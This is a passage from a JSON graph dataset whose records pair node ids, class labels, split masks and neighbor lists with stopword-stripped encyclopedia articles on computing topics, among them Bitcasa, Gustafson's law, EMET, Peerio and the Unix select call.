    "text": "Bitcasa:bitcasa bitcasa inc. american cloud storage company founded 2011 st. louis missouri company later based mountain view california shut 2017 bitcasa provided client software microsoft windows os x android web browsers ios client pending apple approval former product infinite drive provided centralized storage included unlimited capacity client-side encryption media streaming file versioning backups multi-platform mobile access 2013 bitcasa moved tiered storage model offering 1tb 99/year infinite 999/year october 2014 bitcasa announced discontinuation infinite drive 999/year users would get 10tb storage infinite drive users would required migrate one new pricing plans delete account may 2016 bitcasa discontinued offering cloud storage consumers alleging focusing business products company started idea finalist techcrunch disrupt conference september 2011 2012 tony lee recruited vice president engineering frank meehan joined company board directors june 2012 bitcasa closed 9 million investment investors included crunchfund pelion venture partners horizons ventures andreessen horowitz samsung ventures first round capital ceo brian taptich announced jan 2017 bitcasa acquired intel intel spokesperson later clarified intel acquired bitcasa bitcasa provided client software web browsers os x microsoft windows linux mobile app android windows versions include xp vista windows 7 windows 8 bitcasa products provide centralized streaming storage devices simultaneous real-time access files files uploaded one device instantly available devices bitcasa require file syncing devices centralized storage eliminates need duplicate files across devices wait files become synchronized company patent pending infinite storage algorithm designed reduce actual storage space identifying duplicate content providing encryption stored data according popular mechanics magazine bitcasa uses convergent encryption method whereby client data assigned anonymous identifier uploaded data already exists bitcasa servers popular song uploaded instead earmarked available download client protocol said reduce upload time bitcasa encryption method reportedly cloaks data still client computer blocks data sent enterprise-grade aes-256 encryption method data cloud storage according extremetech service gives users access ownership rights data review gizmodo australia bitcasa cloud service described winner pricier competitors supported mac pc android platforms users could access infinite drive mobile apps android windows rt browsers support offline viewing files app collects displays individual media types photos video music documents independently folder hierarchy stored video files streamed auto-transcoded based device bandwidth items may uploaded downloaded shared directly social media sites files size shared web link distributed via email text im initial server migration apps android ios browsers updated effectively rendering devices unusable service september 2011 article published extreme tech said bitcasa convergent encryption based system mostly safe risks associated november 19 2013 company announced infinite storage offering would increase price move sparked intense reaction users company forum even though existing users grandfathered original pricing plan reactions bloggers particularly critical announcement pricing plans change bitcasa blog commented heavily users post ensuing comments removed internet bitcasa bitcasa introduced interface developers october 23 2014 bitcasa announced would removing grandfathered 'infinite plans although company assured customers plans would continued long cancelled service company removed official blog post though still available wayback machine bitcasa backtracked due 'lack demand 'abuse company instead offered previous clients packages regular users pay 10/month 1tb 99 annually 99/month 10tb 999 annually company gave users 23 days migrate download data would deleted move criticized many users physically possible download rates provided bitcasa result system migration users data loss replaceable angry customers gave company bad feedback community forum became less active company offered yearly subscribers right cancel get prorated refund however disabled ability cancel accounts refused delete accounts support system november 13 2014 northern californian district judge william alsup granted temporary restraining order enjoining bitcasa deleting disabling access infinite plan subscribers data bitcasa filed response 18 november challenging legality tro apparent result restraining order bitcasa announced 5-day extension deadline email users november 16 email mention restraining order hearing set 10.00 19 november bitcasa 'won lawsuit february 2015 community forum shut april 7 2016 company switched free 5gb plan free trial tier users account prior april 7 would automatically start trial 60-day trial user changed paid plan account data deleted server april 21 2016 bitcasa announced would discontinue cloud storage service focus business products users may 20 2016 download data user data could deleted bitcasa shut consumer cloud storage end may 20 2016 offering products developers four months refund customers website bitcasa inaccessible",
    "neighbors": [
      11201,
      6797,
      7983,
      5552,
      823,
      8446
    ],
    "mask": "None"
  },
  {
    "node_id": 5798,
    "label": 3,
    "text": "Gustafson's_law:gustafson law computer architecture gustafson law gustafson–barsis law gives theoretical speedup latency execution task fixed execution time expected system whose resources improved named computer scientist john l. gustafson colleague edwin h. barsis presented article reevaluating amdahl law 1988 gustafson estimated speedup gained using n processors instead one task serial fraction benefit parallelism follows using different variables gustafson law formulated following way gustafson law addresses shortcomings amdahl law based assumption fixed problem size execution workload change respect improvement resources gustafson law instead proposes programmers tend set size problems fully exploit computing power becomes available resources improve therefore faster equipment available larger problems solved within time impact gustafson law shift research goals select reformulate problems solving larger problem amount time would possible way law redefines efficiency due possibility limitations imposed sequential part program may countered increasing total amount computation task executed system whose resources improved compared initial similar system split two parts example — computer program processes files disk part program may scan directory disk create list files internally memory another part program passes file separate thread processing part scans directory creates file list sped parallel computer part processes files execution workload whole task improvement resources system denoted formula_3 includes execution workload part benefit improvement resources execution workload one benefits fraction execution workload would benefit improvement resources denoted formula_4 fraction concerning part would benefit therefore execution part benefits improvement resources sped factor formula_6 improvement resources consequently execution workload part benefit remains theoretical execution workload formula_7 whole task improvement resources gustafson law gives theoretical speedup latency execution whole task fixed time formula_9 yields amdahl law presupposes computing requirements stay given increased processing power words analysis data take less time given computing power gustafson hand argues computing power cause data carefully fully analyzed pixel pixel unit unit rather larger scale would possible practical simulate impact nuclear detonation every building car contents including furniture structure strength etc calculation would taken time available provide answer increase computing power prompt researchers add data fully simulate variables giving accurate result amdahl law reveals limitation example ability multiple cores reduce time takes computer boot operating system ready use assuming boot process mostly parallel quadrupling computing power system took one minute load might reduce boot time fifteen seconds greater greater parallelization would eventually fail make bootup go faster part boot process inherently sequential gustafson law argues fourfold increase computing power would instead lead similar increase expectations system capable one-minute load time acceptable users starting point increase features functions system time taken boot operating system i.e one minute new system would include graphical user-friendly features problems fundamentally larger datasets example processing one data point per world citizen gets larger percent per year principal point gustafson law problems likely fruitful applications parallelism algorithms nonlinear runtimes may find hard take advantage parallelism exposed gustafson law snyder points n algorithm means double concurrency gives 26 increase problem size thus may possible occupy vast concurrency may bring little advantage original less concurrent solution—however practice still considerable improvements hill marty emphasize also methods speeding sequential execution still needed even multicore machines point locally inefficient methods globally efficient reduce sequential phase furthermore woo lee studied implication energy power future many-core processors based amdahl law showing asymmetric many-core processor achieve best possible energy efficiency activating optimal number cores given amount parallelism known prior execution",
    "neighbors": [
      6656,
      9224,
      785,
      6801,
      7313,
      7699,
      153,
      7963,
      6815,
      2210,
      9126,
      6184,
      2345,
      5802,
      4909,
      8367,
      7218,
      10675,
      8501,
      5948,
      4286,
      2113,
      8514,
      5956,
      4423,
      1480,
      6909,
      330,
      1866,
      7497,
      8523,
      78,
      9932,
      4308,
      2008,
      344,
      2394,
      731,
      2140,
      2396,
      2264,
      7006,
      11487,
      2273,
      4194,
      5090,
      11618,
      7142,
      5223,
      2536,
      8810,
      4205,
      1778,
      6774,
      7802,
      508,
      3197,
      8447
    ],
    "mask": "Test"
  },
  {
    "node_id": 5799,
    "label": 4,
    "text": "Enhanced_Mitigation_Experience_Toolkit:enhanced mitigation experience toolkit enhanced mitigation experience toolkit emet freeware security toolkit microsoft windows developed microsoft provides unified interface enable fine-tune windows security features used extra layer defense malware attacks firewall antivirus software emet targeted mostly system administrators newest version supported windows user running windows 7 later windows server 2008 r2 later .net framework 4.5 installed older versions used windows xp features available version 4.1 last version support windows xp microsoft announced emet reach end life july 31 2018 successors emet processmitigations module —aka process mitigation management tool —and windows defender exploit guard available windows 10 windows server 2016",
    "neighbors": [
      2309,
      1417,
      2443,
      6797,
      9488,
      537,
      3482,
      2213,
      8998,
      5673,
      7983,
      7473,
      5176,
      5057,
      10828,
      1745,
      5082,
      9695,
      3935,
      11248
    ],
    "mask": "None"
  },
  {
    "node_id": 5800,
    "label": 3,
    "text": "Univention_Corporate_Server:univention corporate server univention corporate server ucs server operating system derived debian gnu/linux integrated management system central cross-platform administration servers services clients desktops users well virtualized computers operated ucs addition operation local virtual instances ucs also operated openstack-based microsoft azure-based amazon ec2-based cloud environments via integration open source software samba 4 univention also supports functions provided many companies microsoft active directory administration computers operated microsoft windows ucs-based components ucs-certified established third party products installed integrated via univention app center ucs provides app center applications runtime environment services operation including central consistent management apps docker containers also run ucs systems several apps available app center docker-based univention member open source business alliance supports creation open source business alliance open source software stacks impulse development ucs began 2002 lack standardised linux server operating system offering companies organisations alternative microsoft ’ domain concept proprietary directory service active directory comparable linux solutions e.g. suse red hat offer integrated cross-system user computer management system result corresponding solutions configured maintained individually important early driving forces development ucs initially oldenburgische landesbank department bremen senator education science product ready market launch end 2004 since addition new versions number software solutions based main product ucs also launched ucs predominantly employed german-speaking world companies public organisations wide range sectors fields among others regional government authority federal state brandenburg 2005 univention began market ucs also german-speaking countries today ucs used many european countries also outside europe example australia nigeria usa univention established subsidiary 2013 ucs open-source software proprietary developments univention gmbh included ucs published gnu gpl version 2.3 launch version 2.4 company switched gnu agpl also range software appliances based ucs e.g. groupware desktop service management fields since april 21 2015 ucs freely available companies form ucs core edition replaced previous „ free personal use license core edition fully featured version differs fee-based edition terms product liability support univention corporate server based linux distribution debian gnu/linux numerous open source applications integrated ucs example samba authentication service kerberos virtualization software kvm nagios monitoring servers core important unique selling point ucs central administration tool univention management console allows cross-system cross-location management infrastructures ucs uses directory service openldap save data identity system management administration tools operated via web-based applications command-line interfaces thanks integrated administration service ucs virtual machine manager uvmm administration tools also allow central administration virtualized servers clients hard drives cdrom dvd images well physical systems operated manufacturer goes great lengths guarantee possibilities integration ucs existing environments via use open standards supplied connectors way integrated tool active directory connection allows bidirectional synchronisation microsoft directory service active directory directory service used ucs openldap addition ucs offers various interfaces manufacturers application software enabling integrate applications ucs management system since ucs 3.1 ucs provides univention app center graphic management component installation deinstallation ucs components ucs-certified third-party appliances univention app center includes beside univention solutions example open source groupware solutions kopano open-xchange document management system agorum core slack alternative rocket.chat dropbox alternatives owncloud nextcloud collaboration solutions onlyoffice collabora",
    "neighbors": [
      929,
      1761,
      2179,
      6622,
      8262,
      4841,
      362,
      5067,
      1935,
      3791,
      7248,
      6098,
      8439,
      9455,
      823,
      1211,
      2910
    ],
    "mask": "Test"
  },
  {
    "node_id": 5801,
    "label": 8,
    "text": "Wingify:wingify wingify software company based new delhi india products include vwo a/b testing conversion optimization platform pushcrew push notification service web mobile wingify founded 2010 paras chopra sparsh gupta office new delhi company bootstrapped 2017 annual revenue 18 million success products wingify bootstrap champ category economic times startup awards 2017 india owing success company forbes featured wingify founder paras chopra 30 30 list influential people india 2014 february 2018 wingify announced sparsh gupta company chief operating officer appointed new ceo paras chopra remaining chairman",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 5802,
    "label": 3,
    "text": "Moore's_second_law:moore second law rock law moore second law named arthur rock gordon moore says cost semiconductor chip fabrication plant doubles every four years 2015 price already reached 14 billion us dollars rock law seen economic flip side moores first law – number transistors dense integrated circuit doubles every two years latter direct consequence ongoing growth capital-intensive semiconductor industry— innovative popular products mean profits meaning capital available invest ever higher levels large-scale integration turn leads creation even innovative products semiconductor industry always extremely capital-intensive ever-dropping manufacturing unit costs thus ultimate limits growth industry constrain maximum amount capital invested new products point rock law collide moore law suggested fabrication plant costs increased quickly predicted rock law – indeed plateauing late 1990s – also fabrication plant cost per transistor shown pronounced downward trend may relevant constraint moore law",
    "neighbors": [
      6656,
      2273,
      5798,
      78,
      8367,
      785,
      1778,
      6801,
      153,
      7006
    ],
    "mask": "Train"
  },
  {
    "node_id": 5803,
    "label": 9,
    "text": "Portable_Standard_Lisp:portable standard lisp portable standard lisp psl programming language dialect language lisp psl inspired predecessor standard lisp portable lisp compiler tail-recursive late binding dynamically bound developed researchers university utah 1980 released psl 3.1 development handed developers hewlett-packard 1982 released psl 3.3 portable standard lisp available kit containing screen editor compiler interpreter several hardware operating system computing platforms including motorola 68000 series decsystem-20s cray-1s vax many others today psl mainly developed available konrad-zuse-zentrum für informationstechnik berlin zib main modern use underlying language implementations reduce like older lisps first step psl compiles lisp code lap code another cross-platform language however older lisps mostly compiled lap directly assembly language architecture dependent intermediate psl compiles lap c code would run virtual machine language programs written portable c principle portable compiler written psl primitive dialect named system lisp syslisp ... experiment writing production-quality lisp lisp much possible minor amounts code written hand assembly language systems languages whole ensemble could bootstrap improvements compiler improved compiler later releases compatibility package common lisp sustained modern versions portable standard lisp fewer features lisps common lisp people found unpleasant use richard p. gabriel wrote popular essay lisp good news bad news win big third standard lisp portable standard lisp ran many machines people wanted use",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      6717,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      11361,
      7267,
      2660,
      8293,
      9320,
      2666,
      5751,
      7805,
      9345,
      1159,
      9865,
      9877,
      2225,
      11447,
      6840,
      7867,
      4799,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      3334,
      6919,
      3336,
      5384,
      8973,
      10510,
      1301,
      10012,
      3869,
      2335,
      2849,
      7981,
      7983,
      2352,
      10547,
      311,
      6969,
      3408,
      6994,
      11604,
      1365,
      2392,
      10584,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      4998,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      4550,
      11218,
      10712,
      3034,
      477,
      3051,
      5611,
      5612,
      9714,
      7670,
      11255,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 5804,
    "label": 3,
    "text": "University_of_Tampere:university tampere university tampere uta public university tampere finland merged tampere university technology create new tampere university 1 january 2019 university offered undergraduate postgraduate doctoral programmes 20,178 degree students 1,981 employees 2016 founded 1925 helsinki civic college 1930 onwards known school social sciences institution relocated tampere 1960 renamed university tampere 1966 2016 budget €184.6 million 59 government funding institution established 1925 civic college helsinki teaching public administration organisation management journalism inaugural intake 72 students 1930 total 195 students enrolled college name amended school social sciences similarly institution vocationally oriented bachelor degrees expanded municipal administration public law child protection civic education well master degree social sciences first faculty faculty social sciences established 1949 number students steadily increased 227 1940 661 1950 programmes offered school grew degrees social youth work librarianship economics well prison officer diploma first doctoral degree completed 1955 1956 city tampere school social sciences agreed relocating school tampere 1960 number students increased 933 school social sciences moved new päätalo main building designed toivo korhonen kalevantie 4 tampere faculty humanities faculty economics business administration established 1964 1965 respectively school social sciences renamed university tampere 1966 programme called tampere3 merge university tampere university technology tampere university applied sciences started spring 2014 merger approved parliament december 2017 came effect 1 january 2019 new foundation-based interdisciplinary higher education institution named tampere university proposed name tampere new university faced criticism total 14,712 degree students studied university tampere 2016 including 11,810 students bachelor master degree programmes 1,646 doctoral students likewise 2016 university received 17,482 applications 1,418 enrolled admission rate 8.1 hosted four centres excellence research mitochondrial disease russian studies 2016 2017 tuition fee approximately 10,000 euros charged general non-european union/european economic area citizens studying english-taught master degree programmes 50 100 cover scholarships available students exchange doctoral students exempt fees university ranked 201–250 times higher education world university rankings 2018 likewise ranked 551-600 qs world university rankings 2018 101-150 communication media studies category 2016 total budget university 184.6 million euros 108.8 million core funding government finland 67.49 million external endowments addition independent units finnish social science data archive fsd laboratory services language centre library university organized six faculties 1 january 2017 reorganization following people served rectors university tampere university tampere two campuses tampere main campus centre near tampere railway station kauppi campus next tampere university hospital main campus hosted faculties comprised päätalo pinni linna virta buildings faculty medicine life sciences laboratory services located arvo building kauppi campus päätalo building completed 1960 served university first premises tampere pinni complex completed gradually 1990s 2000s linna virta buildings ready use 2006 2009 respectively medicine-focused arvo building built two separate phases reached 2009 2016 floor area university facilities totaled 130,134 2016 instead dormitories campuses tampere student housing foundation rented apartments students around tampere",
    "neighbors": [
      415
    ],
    "mask": "None"
  },
  {
    "node_id": 5805,
    "label": 4,
    "text": "Sysjail:sysjail sysjail defunct user-land virtualiser systems supporting systrace library version 1.0 limited openbsd netbsd miros original design inspired freebsd jail similar utility although part kernel freebsd sysjail developed released 2006 kristaps dzonsons aka johnson research assistant game theory stockholm school economics maikls deksters sysjail re-written scratch 2007 support emulated processes jails limited initially linux emulation project officially discontinued 3 march 2009 due flaws inherent syscall wrapper-based security architectures restrictions sysjail could evaded exploiting race conditions wrapper security checks kernel execution syscalls",
    "neighbors": [
      6438,
      6184,
      5492,
      2164,
      823
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5806,
    "label": 1,
    "text": "Comparison_of_database_access:comparison database access orms manage database class represents row table named table",
    "neighbors": [
      9729,
      1931,
      6414,
      10510,
      6160,
      5521,
      3736,
      155,
      5796,
      9008,
      3765,
      7479,
      10043,
      10684,
      963,
      8644,
      5961,
      1610,
      1611,
      9804,
      8397,
      11212,
      11219,
      5588,
      2901,
      7894,
      4057,
      10586,
      8539,
      4069,
      7274,
      8554,
      7022,
      6640,
      1016,
      3577,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 5807,
    "label": 0,
    "text": "RWTH_ASR:rwth asr rwth asr short rasr proprietary speech recognition toolkit toolkit includes newly developed speech recognition technology development automatic speech recognition systems developed human language technology pattern recognition group rwth aachen university rwth asr includes tools development acoustic models decoders well components speaker adaptation speaker adaptive training unsupervised training discriminative training word lattice processing software runs linux mac os x project homepage offers ready-to-use models research purposes tutorials comprehensive documentation toolkit published license called rwth asr license derived qpl license grants free usage including re-distribution modification non-commercial use unlike qpl permit commercial use",
    "neighbors": [
      10557,
      823
    ],
    "mask": "None"
  },
  {
    "node_id": 5808,
    "label": 1,
    "text": "Halloween_Problem:halloween problem computing halloween problem refers phenomenon databases update operation causes change physical location row potentially allowing row visited operation could even cause infinite loop cases updates continually place updated record ahead scan performing update operation potential database error first discovered chamberlin pat selinger morton astrahan 1976 halloween day working query supposed give ten percent raise every employee earned less 25,000 query would run successfully errors finished employees database earned least 25,000 kept giving raise reached level expectation query would iterate employee records salary less 25,000 precisely fact even updated records visible query execution engine continued match query criteria salary records matching multiple times time given 10 raise greater 25,000 name descriptive nature problem rather given due day discovered recounted chamberlin pat morton discovered problem halloween ... remember came office said ‘ chamberlin look make sure optimizer making plan processing update ’ use index based field updated going ’ happened friday said ‘ listen going able solve problem afternoon let ’ give name ’ call halloween problem ’ work next week. ’ turns called ever since",
    "neighbors": [
      2688,
      9481,
      10505,
      10258,
      10518,
      4376,
      9112,
      7968,
      290,
      1314,
      7461,
      8742,
      5550,
      10418,
      9527,
      3768,
      3004,
      9661,
      9663,
      4416,
      2369,
      5441,
      11457,
      8518,
      72,
      853,
      2901,
      9942,
      9177,
      987,
      860,
      9183,
      11362,
      10471,
      8808,
      6383,
      9079,
      2681,
      9467
    ],
    "mask": "Test"
  },
  {
    "node_id": 5809,
    "label": 5,
    "text": "Digital_subscriber_line_access_multiplexer:digital subscriber line access multiplexer digital subscriber line access multiplexer dslam often pronounced dee-slam network device often located telephone exchanges connects multiple customer digital subscriber line dsl interfaces high-speed digital communications channel using multiplexing techniques dslam equipment collects data many modem ports aggregates voice data traffic one complex composite signal via multiplexing depending device architecture setup dslam aggregates dsl lines asynchronous transfer mode atm frame relay and/or internet protocol network i.e. ip-dslam using packet transfer mode transmission convergence ptm-tc protocol stack aggregated traffic directed telco backbone switch via access network also called network service provider nsp 10 gbit/s data rates dslam acts like network switch since functionality layer 2 osi model therefore re-route traffic multiple ip networks isp devices end-user connection points dslam traffic switched broadband remote access server end-user traffic routed across isp network internet customer-premises equipment interfaces well dslam connected may take advantage enhanced telephone voice data line signaling features bandwidth monitoring compensation capabilities supports dslam may may located telephone exchange may also serve multiple data voice customers within neighborhood serving area interface sometimes conjunction digital loop carrier dslams also used hotels lodges residential neighborhoods businesses operating private telephone exchange addition data switch multiplexer dslam also large collection modems modem aggregation card communicates single subscriber dsl modem modem functionality integrated dslam instead done via external device like 20th-century voiceband modem like traditional voice-band modems dslam integrated dsl modems usually able probe line adjust electronically digitally compensate forward echoes bandwidth-limiting factors order move data maximum possible connection rate compensation capability also takes advantage better performance balanced line dsl connections providing capabilities lan segments longer physically similar unshielded twisted pair utp ethernet connections since balanced line type generally required hardware function correctly due nominal line impedance measured ohms comprising resistance inductance balanced lines somewhat lower utp thus supporting 'weaker signals however solid-state electronics required construct digital interfaces costly balanced pair cable higher attenuation higher frequencies therefore longer wire dslam subscriber slower maximum possible data rate due lower frequencies used limit total attenuation due higher number errors higher frequencies effectively lowering overall frequency/data rate following rough guide relation wire distance based 0.40 mm copper adsl2+ technology maximum data rate local conditions may vary especially beyond 2 km often necessitating closer dslam bring acceptable bandwidths customers connect dslam adsl modems dsl routers connected pstn network via typical unshielded twisted pair telephone lines dslam multiple aggregation cards card multiple ports customers lines connected typically single dslam aggregation card 24 ports number vary manufacturer common dslams housed telco-grade chassis supplied nominal 48 volts dc hence typical dslam setup may contain power converters dslam chassis aggregation cards cabling upstream links upstream trunk isp side many early dslams used atm—and approach standardized dsl forum—with gigabit ethernet support appearing sometime later today common upstream links dslams use gigabit ethernet multi-gigabit fiber optic links ip-dslam stands internet protocol digital subscriber line access multiplexer user traffic mostly ip based traditional 20th century dslams used asynchronous transfer mode atm technology connect upstream atm routers/switches devices extract ip traffic pass ip router ip network division work thought sensible dsl based atm could theoretically carry data ip atm stream contrast ip-dslam extracts ip traffic dslam passes ip router advantages ip-dslam traditional atm dslam merged equipment less expensive make operate offer richer set features",
    "neighbors": [
      5472,
      1121,
      361,
      1967,
      2994,
      7865,
      7065
    ],
    "mask": "None"
  },
  {
    "node_id": 5810,
    "label": 9,
    "text": "Location_API_for_Java_ME:location api java location api java compact generic java 2 api produces information device present physical location java applications api optionally supported mobile phone pda manufacturers minimum java platform required api cldc v1.1 location api developed java community process jsr 179 released september 2003 updated version 1.0.1 march 2006 nokia main author maintainer jsr openlapi lgpl implementation use emulator environments nokia reference implementation exist devices access gps device bluetooth location api designed work many different positioning methods generic interfaces lets application developers implement systems retrieve location data multiple sources based availability device advantages single means tracking including fail-over indoor/outdoor transparency choice speed accuracy trade-offs gps cellular positioning methods api supports location api support previously location service implementations provider specific aim api provide common api retrieving location information variety devices openlapi supports several back-ends along device specific wrappers since many providers choose implement optional jsr goal universality still happened developers often required create custom builds different devices location api available java applications blackberry windows mobile devices recent motorola sony ericsson devices nokia series 60 3rd edition devices",
    "neighbors": [
      2208,
      4960,
      3561,
      7246,
      8882,
      9011
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5811,
    "label": 5,
    "text": "GTunnel:gtunnel gtunnel windows application developed garden networks sets local http socks proxy server tunnels traffic server farm reaches intended destination gtunnel protects internet users privacy freedom speech ways gtunnel version 1.1 provides standard mode main working mode provides best data transfer performance connecting back-end servers directly skype mode tor mode go computers p2p network gtunnel also improved user interface features real-time traffic graphs gtunnel replaces earlier garden g2 client software becomes main client software garden networks gtunnel works linux wine support",
    "neighbors": [
      5405,
      4725,
      5887
    ],
    "mask": "None"
  },
  {
    "node_id": 5812,
    "label": 4,
    "text": "Model-driven_security:model-driven security model-driven security mds means applying model-driven approaches especially concepts behind model-driven software development security general concept model-driven security earliest forms around since late 1990s mostly university research first commercialized around 2002 also body later scientific research area continues day specific definition model-driven security specifically applies model-driven approaches automatically generate technical security implementations security requirements models particular model driven security mds tool supported process modelling security requirements high level abstraction using information sources available system produced stakeholders inputs expressed domain specific languages dsl transformed enforceable security rules little human intervention possible mds explicitly also includes run-time security management e.g entitlements/authorisations i.e run-time enforcement policy protected systems dynamic policy updates monitoring policy violations model-driven security also well-suited automated auditing reporting documenting analysis e.g compliance accreditation relationships models technical security implementations traceably defined model-transformations several industry analyst sources state mds significant impact information security infrastructure required become increasingly real-time automated adaptive changes organisation environment many information technology architectures today built support adaptive changes e.g service oriented architectures soa so-called platform-as-a-service mashups cloud computing information security infrastructure need support adaptivity agility term devopssec see devops used analysts equivalent model-driven security mds automates generation re-generation technical security enforcement generic models apart academic proof-of-concept developments commercially available full implementations model-driven security authorization management policy automation include objectsecurity openpmf earned listing gartner cool vendor report 2008 advocated number organizations e.g u.s. navy means make authorization policy management easier automated",
    "neighbors": [
      7368,
      4107,
      210,
      10580,
      2013
    ],
    "mask": "None"
  },
  {
    "node_id": 5813,
    "label": 4,
    "text": "Peerio:peerio peerio cross-platform end-to-end encrypted application provides secure messaging file sharing cloud file storage peerio available application ios android macos windows linux peerio legacy originally released 14 january 2015 replaced peerio 2 15 june 2017 messages user files stored peerio cloud protected end-to-end encryption meaning data encrypted way read third parties peerio service providers security provided single permanent key-password peerio called account key company peerio technologies inc. founded 2014 vincent drouin intent behind peerio provide security program easier use current pgp standard peerio allows users share encrypted messages files direct messages groups peerio calls rooms peerio rooms offered team-oriented group chat allowing administrative functionality add remove users group chat peerio allows users store encrypted files online offering limited cloud storage free optional paid upgrades peerio messages files persist logins hardware differing ephemeral encrypted messaging apps retain message file history logins different devices peerio supports application based multi-factor authentication peerio allows users share animated gifs peerio utilizes end-to-end encryption applied default message file data end-to-end encryption intended encrypt data way sender intended recipients able decrypt thus read data taken peerio privacy policy peerio utilizes nacl pronounced salt cryptographic framework uses following cryptographic primitives additionally peerio uses scrypt memory-hard key derivation blake2s used various hashing operations in-transit encryption peerio services use transport layer security tls best-practice cipher suite configuration including support perfect forward secrecy pfs view detailed up-to-date independent review peerio ’ tls configuration ssl labs prior peerio initial release software audited german security firm cure53 found non-security related bugs fixed prior applications release according peerio website application also audited march 2017 cure53 peerio partly open source publishes code publicly github peerio offers bug bounty offering cash rewards anyone reports security vulnerabilities first iteration peerio peerio legacy developed nadim kobeissi florencia herra-vega released 14 january 2015 closed 8 january 2018 peerio legacy free application available android ios windows macos linux google chrome extension offered end-to-end encryption enabled default encryption used minilock open-source security standard also developed kobeissi 15 june 2017 peerio 2 launched successor peerio legacy according company blog peerio 2 purported radical overhaul original application core technology claimed benefits comparison peerio legacy include increased speed support larger file transfers 7000gb re-designed user interface peerio also stated added focus towards businesses looking encrypted team collaboration software",
    "neighbors": [
      711,
      11211,
      5612,
      6797,
      11244,
      7983,
      11221,
      823,
      8283,
      6814
    ],
    "mask": "Test"
  },
  {
    "node_id": 5814,
    "label": 9,
    "text": "AlphaBasic:alphabasic alphabasic computer programming language created alpha microsystems 1976 language written alpha microsystems employees paul edelstein dick wilcox bob courier alphabasic shares much common basic languages offer fairly unusual features multi-user orientation ability control memory layout variables map statement calling external assembly language subroutines xcall statement language designed developers vertical market software packages compiler runtime system written motorola 68000 assembly language thus able run alpha microsystems hardware compiler emits interpreter code",
    "neighbors": [
      1952,
      7269,
      477
    ],
    "mask": "Validation"
  },
  {
    "node_id": 5815,
    "label": 3,
    "text": "Select_(Unix):select unix select system call application programming interface api unix-like posix-compliant operating systems examining status file descriptors open input/output channels select system call similar poll facility introduced unix system v later operating systems however c10k problem select poll superseded likes kqueue epoll /dev/poll i/o completion ports c programming language select system call declared header file sys/select.h unistd.h following syntax codice_1 arguments may manipulated four utility macros fd_set fd_clr fd_zero fd_isset select returns total number bits set readfds writefds errorfds zero timeout expired -1 error sets file descriptor used select finite size depending operating system newer system call poll provides flexible solution",
    "neighbors": [
      4616,
      3082,
      10785,
      6180,
      8242,
      4161,
      8772,
      6213,
      8268,
      589,
      593,
      8275,
      6244,
      5222,
      10856,
      4207,
      5244,
      4734,
      11391,
      7821,
      4238,
      10382,
      2711,
      6808,
      9882,
      6813,
      1694,
      2723,
      3237,
      8364,
      10933,
      5822,
      5824,
      1736,
      2762,
      6352,
      4831,
      8928,
      2278,
      233,
      7403,
      4333,
      10482,
      8439,
      2809,
      1291,
      4367,
      8975,
      5397,
      792,
      295,
      1839,
      1332,
      6968,
      7992,
      318,
      9538,
      3911,
      6988,
      10063,
      4437,
      11095,
      1889,
      10091,
      8573,
      8066,
      900,
      4493,
      9621,
      1431,
      8602,
      11678,
      7584,
      1444,
      1445,
      9637,
      935,
      4521,
      4011,
      1456,
      2994,
      1972,
      9667,
      457,
      2529,
      6625,
      8676,
      2021,
      1513,
      3055,
      5105,
      2036,
      5620,
      8186,
      2044
    ],
    "mask": "None"
  },
  {
    "node_id": 5816,
    "label": 6,
    "text": "ISO_13490:iso 13490 iso/iec 13490 also known ecma-168 successor iso 9660 level 3 intended describe file system cd-rom cd-r. iso 13490 several improvements predecessor fully addresses filename posix attribute multibyte character issues handled iso 9660 also efficient format permits incremental recording permits iso 9660 format iso/iec 13490 format co-exist media also specifies use multisession properly derived frankfurt group formed 1990 many cd-rom cd-wo hardware media manufacturers cd-rom data publishers users cd-roms major computer companies proposal fully supports orange book media iso 13490 define rule operating systems read multiple-session iso 9660 volume cd-r instead looking volume descriptor offset 32,768 sector number 16 cd start disc would default behavior iso 9660 programs accessing disc start reading 16th sector first track latest session sector numbers form contiguous sequence starting first session continue added sessions gaps hence cd mastering program wants add single file cd-r iso 9660 volume append session containing least updated copy entire directory tree plus new file duplicated directory entries still reference data files previous session similar way file data updated even removed removal however virtual removed content appear directory shown user still physically present disc therefore recovered takes space cd become full even though appearing still unused space though originally intended multisession support apply mode 2 form 1 formatted discs cd writing software supported multisession writing mode 1 format discs since early disc drives supported multisession mode 1 discs many cases second following sessions would become unreachable drives older cd writing software nero burning rom would import previous session data inserted disc could thus write subsequent session disc computer written previous sessions previous session data saved writing software closed",
    "neighbors": [
      5120,
      10752,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      5149,
      9245,
      9249,
      9762,
      5158,
      7720,
      3126,
      1079,
      7225,
      11323,
      8772,
      1610,
      9290,
      1109,
      4708,
      9836,
      7789,
      5231,
      9333,
      6263,
      9335,
      9343,
      7818,
      654,
      2193,
      2194,
      2197,
      8854,
      2199,
      11419,
      2206,
      6309,
      1190,
      5286,
      10405,
      5293,
      7342,
      10413,
      7344,
      1203,
      2230,
      1212,
      8380,
      3265,
      10951,
      8904,
      9420,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8421,
      8426,
      8938,
      1263,
      3312,
      3826,
      2291,
      3315,
      246,
      3834,
      3328,
      11012,
      2314,
      8461,
      6416,
      1810,
      6935,
      11033,
      11036,
      287,
      1825,
      6434,
      5413,
      3368,
      4907,
      9004,
      302,
      11056,
      6961,
      6963,
      1844,
      10238,
      6970,
      11072,
      6977,
      3909,
      2378,
      8524,
      4431,
      5969,
      2904,
      346,
      2395,
      2397,
      10596,
      2407,
      10087,
      11638,
      3447,
      376,
      6519,
      890,
      11128,
      7554,
      3462,
      8075,
      7565,
